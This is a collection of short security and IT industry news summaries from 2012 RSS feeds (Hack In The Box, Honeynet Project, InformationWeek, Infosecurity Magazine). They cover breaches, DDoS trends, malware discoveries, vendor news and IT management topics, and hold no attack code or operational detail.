http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/The_Pirate_Bay The Pirate Bay has made an important change to its infrastructure. The world's most famous BitTorrent site has switched its entire operation to the cloud. From now on The Pirate Bay will serve its users from several cloud hosting providers scattered around the world. The move will cut costs, ensure better uptime, and make the site virtually invulnerable to police raids, all while keeping user data secure. The Pirate Bay is loved by millions of file-sharers but is also a thorn in the side of the entertainment industries. Tags: Industry News, Piratebay

==> #HITB2012KUL: An eco-system of disruptions and dependencies

http://www.hackinthebox.org/backend.php http://www.digitalnewsasia.com/sites/default/files/images/digital%20economy/Mikko%20Chopped.JPG THE Hack In The Box Security Conference in Kuala Lumpur (HITBSecConf2012 or HITB2012KUL) that ran from Oct 10-11 was a fitting monument to the series' 10th anniversary. Tags: HITB, HITB2012KUL, Industry News

==> Don't secure the internet, it needs crime: Whitfield Diffie

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/lassi_kurkijarvi/3456993824/ While many people see securing the internet as a means to stopping cybercrime, former vice president for information security and cryptography at the Internet Corporation for Assigned Names and Numbers (ICANN) Whitfield Diffie thinks that internet crime may be necessary. Diffie, who spoke at the Australian Information Security Association's National Conference 2012 in Sydney this week, is better known for his contribution to the cryptography community by devising with Martin Hellman and Ralph Merkle the Diffie-Hellman public key exchange method. Tags: Security

==> Security flaw found in Steam

http://www.hackinthebox.org/backend.php http://limages.vr-zone.net/body/17477/steam_0.jpg.jpeg Hackers could have a new means of accessing your computer through a browser command which utilizes Valve's software distribution system Steam. When your browser accesses a URL that begins with the command "steam://", it will prompt your copy of Steam to launch and perform some operation. Usually, such an operation would be to launch a game, or install or uninstall software. Tags: Security, Games

==> Pacemaker hacker says worm could possibly 'commit mass murder'

http://www.hackinthebox.org/backend.php http://blogs.computerworld.com/sites/computerworld.com/files/u185/embedded_implanted_pacemaker.png It seems like something is very wrong with the picture when you read the news and it sounds more like a science fiction novel than a newsflash. For example, Barnaby Jack showed how an attacker with a laptop, located up to 50 feet from a victim, could remotely hack a pacemaker and deliver an 830-volt shock. Tags: Security, Science

==> Over 20Gbps DDoS attacks have become common occurrences

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/ Distributed denial-of-service (DDoS) attacks with an average bandwidth of over 20Gbps have become commonplace this year, according to researchers from DDoS mitigation vendor Prolexic. Last year such high-bandwidth attacks were isolated incidents, but attacks that exceed 20Gbps in bandwidth occur frequently now, Prolexic's president Stuart Scholly said Tuesday. Tags: Networking, Security

==> Fortinet, Check Point Dive After Weaker Than Expected Earnings

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Fortinet Fortinet (FTNT) stock plunged nearly 18% early Wednesday after issuing weaker than expected earnings guidance late Tuesday. Fellow networking security vendor Check Point Software Technologies (CHKP) also posted a double-digit intraday loss after its own weak forecast Wednesday. Security stocks had wavered ahead of third-quarter earnings season, with economic issues and slow PC sales leaving investors a little skittish. Tags: Industry News

==> A lesser-known new feature in iOS 6: It's tracking you everywhere

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/l33tdawg/8039255132/in/photostream L33tdawg: We already covered this and the steps needed to turn it off in "Want Better Battery Life in iOS 6? Turn off tracking!" Apple has enabled user tracking of its customers once again, with the recently released iOS 6 enabling advertisers to see which apps users have run, and which adverts they've seen, all for the benefit of the users, of course. Tags: Apple, Privacy, Security, iOS

==> Facebook partners with Panda Security

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Facebook Panda Security signed a collaboration agreement with Facebook to protect users. Facebook users will be able to download a free 6-month version of Panda Internet Security 2013 from the AV Marketplace. Additionally, both companies will share their databases of malicious URLs to protect users while surfing the Web. Tags: Facebook, Panda, Security

==> Zero-day attacks last much longer than most would believe

http://www.hackinthebox.org/backend.php http://cdn.arstechnica.net/wp-content/uploads/2012/10/0day-illustration-640x359.jpg A new report shows that zero-day attacks are more prevalent than previously thought and persist longer than expected before being detected, in some cases for more than 300 days. Security firm Symantec published the findings, which showed that the typical zero-day attack, an exploit for a vulnerability for which there is no patch available, lasted about 10 months on average before being discovered. Tags: Security

==> Adobe Reader and Acrobat get another layer of security

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Adobe_Systems Adobe announced new security features this week for its Reader and Acrobat XI products, including enhanced sandboxing, Force ASLR, PDF whitelisting, and Elliptic Curve Cryptography. In addition to a number of new features enhancing Reader's and Acrobat's PDF-creation capabilities, these security measures add another layer atop previous changes that have improved a once "widely exploited" app over the past two years. Tags: Adobe, Security

==> MasterCard Is Selling Your Data Just in Time for the Holidays

http://www.hackinthebox.org/backend.php http://www.wired.com/images_blogs/business/2012/10/mastercard-660x440.jpeg Credit card companies make money by taking a cut every time you swipe your plastic at the checkout counter. Now MasterCard has found a way to make those swipes pay over and over again. As the Financial Times first reported, MasterCard is packaging its transaction data (your transaction data) and selling it to advertisers. The story was based on an apparently confidential pitch MasterCard made to potential clients. Not too confidential, because we found a copy by googling it. Tags: Privacy

==> HP Annual Report 2012 released

http://www.honeynet.org/rss.xml Each year, the Honeynet Project summarizes its activities and activities of its members in a short annual report. You will find the annual report for fiscal year 2012 attached. Enjoy!

==> Honeynet Project completes Cyber Fast Track Project: Web Application Honeypots

http://www.honeynet.org/rss.xml We are happy to be able to announce the successful completion of The Honeynet Project's participation in DARPA's Cyber Fast Track program with our Web Application Honeypot project. Imperva's recent Web Application Attack Report shows the picture of large scale automated threats towards web applications. Adversaries are basically scanning millions of web applications for vulnerabilities every day and a single successful infection increases their army of workers and thereby their capability for doing more damage. Without a specific target, attackers can leverage automated tools and search engines' excellent information aggregation services to find their victims, identify the vulnerability, and launch an attack. The majority of web application attacks target the web application's database. These so-called SQL injection attacks manipulate the underlying database by providing user input that, due to the vulnerability in the web application, is converted into SQL statements. The main goal of this project was the development of a SQL injection vulnerability emulator that goes beyond the collection of SQL vulnerability probings. It deceives the adversary with crafted responses matching his request into sending us the malicious payload, which could include all kinds of malicious code. The project is being released as open-source and installation instructions can be found on the project page. A detailed report was created as part of the project.

==> Know Your Enemy: Social Dynamics of Hacking

http://www.honeynet.org/rss.xml I am very pleased to announce the publication of another paper in our Know Your Enemy white paper series: "KYE - Social Dynamics of Hacking" authored by Thomas J. Holt and Max Kilger from our Spartan Devils Honeynet Project Chapter. In this paper, Tom and Max go to the roots of the Know Your Enemy series and shine light on the social groups that are involved in hacking. Abstract: Though most information security research focuses on current threats, tools, and techniques to defeat attacks, it is vital to recognize and understand the humans behind attacks. Individual attackers have various skills, motives, and social relationships that shape their actions and the resources they target. In this paper we will explore the distribution of skill in the global hacker community, the influence of on and off-line social relationships, motivations across attackers, and the near-future of threats to improve our understanding of the hacker and attacker community.

==> GSoC 2012 Accepted Students Officially Announced

http://www.honeynet.org/rss.xml Since my last post about the Google Summer Of Code 2012 Student Applications deadline closing and sharing some initial student applications statistics, all the GSoC 2012 mentoring organisations have been hard at work reviewing and scoring their student applications.

==> Google Summer Of Code 2012 Student Applications now closed and some statistics

http://www.honeynet.org/rss.xml After a slower than usual start, this year's Google Summer of Code (GSoC) student applications period closed at 19:00 UTC on Friday April 6th, with a major application rush in the last couple of days which kept us busy right up to the deadline! Many thanks to all the interested students who applied, and our mentors and org admins for taking the time to respond to students on IRC, email and through Melange.

==> Honeynet Project Security Workshop 2012 - VIDEOs posted

http://www.honeynet.org/rss.xml Folks, we had a great time at the Honeynet Project Security Workshop @ Facebook. We'd like to thank again our excellent hosts Facebook, the attendees, and our many speakers. If you were not able to attend, you can check out the videos at http://honeynet.org/SecurityWorkshops/2012_SF_Bay_Area/Mar_19/Workshop_Program_Agenda.

==> Google Summer Of Code 2012 Student Applications - Deadline Approaching

http://www.honeynet.org/rss.xml If you have been following our blog you'll know that the Honeynet Project was very happy to have been accepted as a mentoring organization for Google Summer of Code (GSoC) 2012. If you are a student interested in applying to the Honeynet Project, the student application deadline is 19:00 UTC on Friday April 6th. So with 3 days to go, you need to be planning on submitting your project application via the Melange system soon. To avoid disappointment, please don't leave your application until the last minute - you can edit as often as you want before the deadline.

==> Google Soc 2012 - Honeynet Project Accepted

http://www.honeynet.org/rss.xml We have just been notified by Google that the Honeynet Project has - once again - been accepted as one of the mentoring organizations for Google Summer of Code 2012 (in total 180 organizations were selected). We are very excited and are looking forward to a great summer! Already a big thank you to Google for their continued support! While student applications are not officially open yet, interested students are encouraged to check out our ideas page and get in contact with us via gsoc@public.honeynet.org and/or IRC (#gsoc2012-honeynet on irc.freenode.net) in the next few ideas to meet the mentors and discuss project ideas. Student applications officially open on March 26th 2012 and close on April 6th 2012. We are looking forward to hearing from you!

==> Google Summer of Code 2012 - Organization Application submitted

http://www.honeynet.org/rss.xml Last Friday was the deadline for GSoC 2012 Mentoring Organization Applications. After three successful participations in the Google Summer of Code program in 2009, 2010, and 2011, we - once again - applied to be part of GSoC again this year. Our experience with the program has been tremendous. We have been able to excite students worldwide (many of whom have gone on to become members of the Honeynet Project) for open-source development in the information security space, and several of the leading honeynet open-source tools started with a GSoC project. We are looking forward to getting students involved with our expert mentors again this year to tackle the many research and development problems still remaining in information security. While we patiently await Google's response to our application (the list of officially accepted GSoC 2012 orgs is announced on March 16th 23:00 UTC), we urge you to check out our project ideas page for some suggestions of the type of projects we would like to mentor (although students can also suggest their own ideas too). You can start getting in contact with us on IRC and email to discuss potential project ideas (some of you already are doing so, which is great). You can reach us at #gsoc2012-honeynet on irc.freenode.net as well as by joining our public GSoC ideas mailing list. We hope to hear from you! A big thanks to Google for their continued support for FOSS. We hope we will be accepted to participate as a GSoC mentoring organization again this year and we are all looking forward to a productive and exciting GSoC 2012!

==> Release of WoLF Viz

http://www.honeynet.org/rss.xml Frasier, who participated in our recent visualization forensic challenge has released his visualization tool WoLF Viz at http://code.google.com/p/wolf-viz/. WoLF Viz works by parsing arbitrary text log files into a network (graph) of words, where the words are nodes and the edges are adjacent word pairs. The edge weights are based on how often the two words are seen next to each other.

==> Why GM's Hiring 3,000 IT Pros From HP

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Move answers a key question that had been hanging over GM CIO Randy Mott's strategy.

==> Kontiki: A New Approach To Enterprise Content Delivery

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Startup offers video-based solutions for employee training, communication, and more. Watch our Valley View elevator pitch session with Kontiki's CEO.

==> Big Data Drives Big IT Spending

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN IT spending will hit $34 billion by 2013 as companies upgrade and adapt existing infrastructures to meet the demands of big data, Gartner research predicts.

==> IBM Sales Off Sharply In Third Quarter

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Big Blue sees revenue decline in key areas as sales fail to meet analysts' expectations.

==> How One Midsize Bank Protects Against Hacks

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN In light of ongoing hacktivist attacks on major banks, Lake Trust Credit Union information security pro shares insights on how a smaller bank stays secure without too-big-to-fail resources.

==> Enterprise Hunger For Custom Apps Equals Developer Jobs

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN IT job hunters, it's a good time to be an application developer. Thanks in part to BYOD, the demand for custom enterprise apps is booming.

==> Should High Schools Teach Big Data?

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Given the anticipated shortage of data scientists, some high school educators have jumped in to expose students to big data concepts.

==> How To Close The IT Skills Gap

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Year Up director to discuss program that teaches tech skills to Bay Area students and helps them get industry jobs at E2 Innovate conference.

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> Consumers Pushing Banks To Internet Scale: Financial CTO

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Yobie Benjamin, global CTO for a large financial institution, recently joined David Berlind and Fritz Nelson on the set of InformationWeek's Valley View to discuss his top priorities.

==> CIO Profiles: Richard Thomas Of Quintiles

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN This CIO is strongly in favor of the bring-your-own-device trend.

==> GM To Hire 1,500 IT Pros In Michigan

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN IT development center in Warren is the latest location in General Motors' plan to ramp up staff and reduce its use of outsourcing.

==> Why Business Doesn't Look To IT For Innovation

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Most employees outside of IT don’t call their IT teams very innovative, yet most believe technology is growing in importance, our research shows. Can IT still be the hero?

==> Apple After Jobs: Cook's Real Challenge

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN A year after the death of its charismatic leader, Apple is thriving. But CEO Tim Cook's success may depend on content services--not finding another iPad.

==> Carriers Team Up To Protect LTE Patents

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Despite skepticism about the effectiveness of patent pools, AT&T, Clearwire, Telefonica, and seven others join forces to protect 4G intellectual property.

==> 8 IT Mistakes: Must-Have Lessons From Top CIOs

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Spare the euphemisms. Great teams embrace mistakes and get better.

==> CIO Profile: Darko Dejanovic Of Active Network

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Miscommunication can really wreck an IT project, says this tech chief.

==> IT Staff Shortages May Short Circuit Meaningful Use

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Health IT staff retention is a growing concern for healthcare CIOs, even as they have trouble filling existing openings, reports College of Healthcare Information Management Executives poll.

==> Data Scientist Jobs Hiding Under Less Sexy Titles

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Big data's hottest job title, data scientist, remains rare in online postings. Job seekers can use other keywords to find 'hidden' big data jobs.

==> Valley View Goes Deep With NetSuite

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Watch the full video of the September episode of InformationWeek's Valley View, including the Elevator Pitch segment on emerging technology companies.

==> Former Goldman Programmer Faces New Charges

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Sergey Aleynikov charged with stealing highly confidential software that powers high-frequency trading systems.

==> Big Data Squeezes Legacy IT Spending: IDC

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Along with cloud computing, mobile, and social networking, big data will account for a growing percentage of IT spending, leaving little to maintain older systems, says IDC study.

==> Foxconn Factory Riot Blamed On iPhone 5 Rush

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Workers' advocates say Apple's shiny new gadget is being produced in unsafe conditions, sparking tensions between offshore assembly crews and guards.

==> iPhone 5 Maker Shuts Plant Amid Labor Strife

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Apple and contractor Foxconn are mum on whether facility's closure will impact production of iPhone 5, which is sold out across the country.

==> CIO Profiles: Mark White Of Swank Audio Visuals

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Ignore hyped technologies at your own risk, says this CIO.

==> Silent Circle's Military-Grade Encryption: BYOD Tool?

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Silent Circle's encryption tools for smartphones and tablets are a boon for privacy enthusiasts--but enterprises could find them useful too.

==> VA Computers Remain Unencrypted, Years After Breach

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Report faults IT managers for 6-year delay in adopting security measures.

==> After Benghazi, State Dept. Seeks Diplomat Tracking Technologies

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Following deadly attacks on diplomatic facilities in Libya, the Department of State wants new technology to track employees working in the field.

==> IBM Security Tools Add Hadoop Monitoring

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN A Hadoop intelligence tool stands out as IBM updates its security portfolio to address security issues related to big data, analytics, cloud computing, mainframes, and mobile devices.

==> Election 2012: Could Hackers Change Results?

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Many of the same vulnerabilities exist in electronic voting systems as did the last time we elected a U.S. president. New threats could put voter databases at risk and undermine civic confidence.

==> Crowdstrike Puts APT Attackers On Notice

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Much-watched startup takes an offensive, not defensive, approach to enterprise security. Learn more in this video from Valley View.

==> Google Helps Webmasters Disavow Spammy Links

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN New Disavow tool gives website owners a way to distance their sites from linkspam.

==> Huawei, ZTE: 4 Security Fears

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Trojan equipment? Spy tool? Sloppy code? The information security debate rages on over these Chinese telecom equipment makers.

==> 7 MiniFlame Facts: How Much Espionage Malware Lurks?

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Discovery of Flame and MiniFlame revealed a cyber-espionage operation targeting Lebanon. But many similar threats have yet to surface, say security experts.

==> What Huawei, ZTE Must Do To Regain Trust

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN The U.S. is not the only country scrutinizing the security of Chinese-made telecom equipment from Huawei and ZTE. Without major changes, significant contracts are at risk.

==> How One Midsize Bank Protects Against Hacks

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN In light of ongoing hacktivist attacks on major banks, Lake Trust Credit Union information security pro shares insights on how a smaller bank stays secure without too-big-to-fail resources.

==> Seagate Seeks Enterprise HDD Comeback

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Seagate tries to recapture its lead from Western Digital, debuts three new hard disk drives with enterprise-class performance and security.

==> Hackers Rob $400,000 From Washington Town

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Small Washington State town lost funds from its own Bank of America account, as well as employees' and residents' bank account information.

==> Meet Flame Espionage Malware Cousin: MiniFlame

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Suspected Flame module turns out to be standalone attack code in use since at least 2010, described as targeted cyberweapon for conducting in-depth surveillance and espionage.

==> Bank Hacks: Iran Blame Game Intensifies

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Wells Fargo official says scale of the attacks was "pretty significant." Is this the face of "cyberwar"?

==> Should You Buy From Huawei?

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Congress says U.S. companies should not purchase products from Chinese firms Huawei and ZTE, citing national security concerns. I say Congress is dealing more in fear than facts.

==> LulzSec Attacker Pleads Guilty To Sony Pictures Hack

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Defendant agrees to pay restitution toward Sony's $600,000 data breach cleanup costs.

==> 6 Reasons iOS 6 Jailbreaks Will Be Tough

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Glory hounds hoping to jailbreak Apple's newest devices won't have an easy time of it. Security experts detail the challenges.

==> DOD: Hackers Breached U.S. Critical Infrastructure Control Systems

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Defense secretary Leon Panetta says cyberattacks against critical infrastructure at home and abroad--some of which he called the worst to date--should spark urgent action against the hacker threat.

==> U.S. Bank Hacks Expand; Regions Financial Hit

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Attacks by self-described Muslim hackers, now in their fourth week, hit Regions Financial Thursday. Hacking campaign has also disrupted Capital One and SunTrust banking websites.

==> iOS6 Ad Tracking: How To Opt Out

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN By default, iOS 6 tracks iPhone and iPad owners' browsing history to serve advertisements.

==> Bromium Strengthens Desktop Security Using Virtualization

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Ex-Citrix CTO Simon Crosby says Bromium's vSentry technology isolates suspicious activity in a virtual machine, then identifies and flushes it when the VM is erased.

==> Hackers Launch New Wave Of U.S. Bank Attacks

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Hacker group disrupts Capital One, SunTrust websites, compares its campaign against anti-Muslim movie to Kate Middleton's suit against a French magazine.

==> RIM CIO Talks Enterprise BYOD

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN CIO Robin Bienfait talks about RIM's enterprise-friendly features like BlackBerry Balance, security and apps, and welcoming iOS and Android devices into the mix.

==> Passwords: young people are lax, rich people are careful

http://www.infosecurity-magazine.com/rss/news/ A new survey on password attitudes shows a difference between age groups, income, marital status and more, providing intriguing data that might be as valuable to the sociologist as to the security industry.

==> Twitter blocks neo-Nazi group account in Germany

http://www.infosecurity-magazine.com/rss/news/ Using its new ability to filter accounts on a geographic basis, Twitter is filtering out tweets of a German neo-Nazi group in Germany.

==> William Hague uses visit to Bletchley to announce spy apprenticeships

http://www.infosecurity-magazine.com/rss/news/ On Thursday, UK Foreign Secretary William Hague visited Churchill's wartime golden goose, Bletchley Park, the UK's spiritual home of cryptography. He announced a £480,000 grant to preserve the past, and 100 GCHQ apprenticeships to secure the future.

==> Pacemaker virus could lead to "mass murder"

http://www.infosecurity-magazine.com/rss/news/ Hackers now have a new attack vector, but one with much more serious consequences than data theft or financial ruin: pacemakers and implantable cardioverter-defibrillators (ICDs).

==> ISF launches multi-organization standards initiative to tackle supply-chain security

http://www.infosecurity-magazine.com/rss/news/ Following calls for closer collaboration within the cybersecurity industry, the Information Security Forum (ISF) has kicked off a new global partnership initiative to bring together industry associations, international standards bodies and government agencies from across the landscape to create a standards framework covering supply-chain security.

==> Apple loses the latest battle in its war against Samsung

http://www.infosecurity-magazine.com/rss/news/ In the continuing worldwide battle between Apple and Samsung over smartphone and tablet design and patents, Samsung has emerged victorious in the latest round fought out in the courts of London.

==> IBM makes ten integrated product announcements – stakes claim on holistic security

http://www.infosecurity-magazine.com/rss/news/ Today IBM announces ten different enhancements or new products in its security stable. This is a major development by any standard. However, what lies behind this announcement may well have a more profound and long term effect on the future of security in general and cloud security in particular, than the announcements themselves.

==> The DDoS threat continues to increase – 20 Gbps no longer uncommon

http://www.infosecurity-magazine.com/rss/news/ In Q3 2012 the average size of a DDoS attack increased by around 11% to 4.4 Gbps, the average duration rose slightly from 17 to 19 hours, and the total number of attacks declined by 14%.

==> Top 5 UK SMS spam campaigns are finance-related

http://www.infosecurity-magazine.com/rss/news/ When it comes to mobile spam, some campaigns are destined for the Hall of Fame, thanks to how widespread they've become. Taking a look at the contenders, mobile security firm AdaptiveMobile has ranked the top five SMS spam campaigns that have plagued UK mobile phone users in 2012, and they all revolve around finances.

==> Australia mulls data breach-notification laws

http://www.infosecurity-magazine.com/rss/news/ The Australian Attorney-General's Department is mulling whether or not to introduce mandatory data breach-notification laws. The AG is accepting public comments on the issue ahead of making a decision.

==> Multi-device, multi-vendor IT security departments lack automation, grow risk

http://www.infosecurity-magazine.com/rss/news/ Unsurprisingly, complexity in network security environments, particularly multi-vendor environments, yields risk, according to a new survey. And yet, manual processes and a lack of consolidation across operations are still the norm even as IT departments add more and more vendors, devices and firewall rules. This creates a gap between the capacity of the IT staff to manage systems and the rate of their proliferation.

==> Oracle's critical patch update includes 'game-over' vulnerabilities

http://www.infosecurity-magazine.com/rss/news/ Oracle has issued a large Critical Patch Update (CPU), which contains 109 new security vulnerability fixes across hundreds of Oracle products, including Oracle Database, WebLogic server, PeopleSoft, Siebel, MySQL and VM Virtual Box. While all are in need of immediate attention, some vulnerabilities pose a greater risk than others, researchers warn.

==> (ISC)² creates McNulty award to honor a government security pioneer, names GISLA winners

http://www.infosecurity-magazine.com/rss/news/ Although the federal government is not known for moving quickly in terms of cyber-security, there are some leading lights illuminating the path forward to advanced threat preparedness. In recognition, (ISC)² has announced the recipients of its ninth annual U.S. Government Information Security Leadership Awards (GISLA) program, across five categories. And, it has unveiled a new award, to be given out in October 2013, named in honor of Lynn F. McNulty, CISSP, who passed away in June 2012 and whose innovation, influence and commitment to government information security is considered to be a milestone in the industry.

==> Facebook Improves Security Ahead of UK Government Initiative

http://www.infosecurity-magazine.com/rss/news/ Prime Ministers and companies with falling share values have one thing in common: they both need friends. Mutual co-operation is the obvious next step; and that seems to be happening between the UK government and Facebook.

==> AnonUKIre resurrect #OpTrialAtHome in protest of O'Dwyer extradition

http://www.infosecurity-magazine.com/rss/news/ Yesterday home secretary Theresa May blocked the extradition of hacker Gary McKinnon to the US; but the fate of Richard O'Dwyer remains in the balance. Today, AnonUKIre will announce the continuation of #OpTrialAtHome in defense of O'Dwyer, this time against the originators of the extradition laws.

==> Shining a light on zero-day attacks

http://www.infosecurity-magazine.com/rss/news/ A new study by Symantec researchers seeks a better understanding of zero-day attacks and finds them more prevalent, longer-lasting and more dangerous than hitherto realised.

==> ISO releases cyberspace-focused security standard

http://www.infosecurity-magazine.com/rss/news/ The ISO has released a brand-new cyber-security standard aimed at ensuring the safety of online transactions and personal information exchanged over the internet, including e-commerce, online banking, virtual medical records, remote office applications and more.

==> Wikipedia founder: arbitrary censorship “dangerous to the health of the internet”

http://www.infosecurity-magazine.com/rss/news/ The closing keynote at last week's RSA Europe conference in London was delivered by internet pioneer Jimmy Wales, founder of Wikipedia, where he discussed the role the internet has played in promoting political discourse and the dangers that free speech encounters from censorship and government surveillance.

==> miniFlame emerges as small, highly targeted cyber-espionage tool

http://www.infosecurity-magazine.com/rss/news/ Spyware families are propagating, with the latest identified spawn being miniFlame, a small and highly flexible malicious program suitable for targeted, in-depth cyber espionage operations, according to Kaspersky Lab.

==> Home Office withdraws extradition order against hacker Gary McKinnon

http://www.infosecurity-magazine.com/rss/news/ Gary McKinnon is a UK hacker who has been fighting extradition to the US for more than a decade, accused of what a US attorney described as the biggest military hack of all time. Today home secretary Theresa May finally decided that his extradition should not proceed.

==> Facing a malware onslaught, Google plans scanner for mobile app market

http://www.infosecurity-magazine.com/rss/news/ Google is plotting ways to implement a client-side solution to prevent rogue apps from being downloaded from Google Play, the Android application store, according to an analysis.

==> UK government’s Facebook login proposals don’t hold water

http://www.infosecurity-magazine.com/rss/news/ Earlier this month there was much discussion in leading UK national newspapers about a proposal to allow the use of social media credentials to access government websites. This was confirmed by the Government Digital Service blog, which has promised more details in the next few weeks.

==> FBI issues Android malware warning

http://www.infosecurity-magazine.com/rss/news/ Poor Android. Google's smartphone operating system has offered a rich breeding ground for cybercrime in recent months, and there's little sign that the danger is abating. The latest is a warning from the FBI's Internet Crime Complaint Center (IC3), alerting the populace that the Loozfon and FinFisher malware strains are targeting Android devices again.

==> Google facing a double whammy from Brussels and the FTC

http://www.infosecurity-magazine.com/rss/news/ US and EU regulators are independently considering antitrust action against Google's Search practices, while EU privacy regulators have sent a letter criticizing Google's recently consolidated privacy policy.

==> Randomness and the Intel Ivy Bridge microprocessor

http://www.infosecurity-magazine.com/rss/news/ Cryptography Research (CRI) has published its investigation into the random number generator used by the Intel Ivy Bridge processor, the processor that is likely to be used by the majority of new PCs and laptops now and for the immediate future.

==> ENISA summarizes risks and opportunities of IT consumerization

http://www.infosecurity-magazine.com/rss/news/ The European Network and Information Security Agency (ENISA) has summarized both the risks and opportunities in the consumerization of IT, the business trend that includes BYOD.

==> TD Bank lost customer data – six months ago

http://www.infosecurity-magazine.com/rss/news/ The first public indication of the loss appeared on the California Attorney General website, with the publication of a sample notification letter now being sent to the bank's affected customers.

==> ISF issues cybersecurity Benchmark as a Service

http://www.infosecurity-magazine.com/rss/news/ In an effort to make the evaluation of security resilience and risk reduction strategies more accessible, the Information Security Forum (ISF) has launched a Benchmark as a Service (BaaS) tool, for real-time benchmarking via the cloud.

==> Hackers and crackers invited to decode an 'unbreakable' secret message

http://www.infosecurity-magazine.com/rss/news/ Wannabe code-crackers have a fresh challenge to rise to, if DeTron has its way. The encryption company ran a full page ad in the New York Times late last week challenging code breakers, hackers and cryptographers to crack a message encrypted by Quantum Direct Key (QDK), a personal identification encryption technology aimed at eliminating multiple passwords for cloud services and web apps.

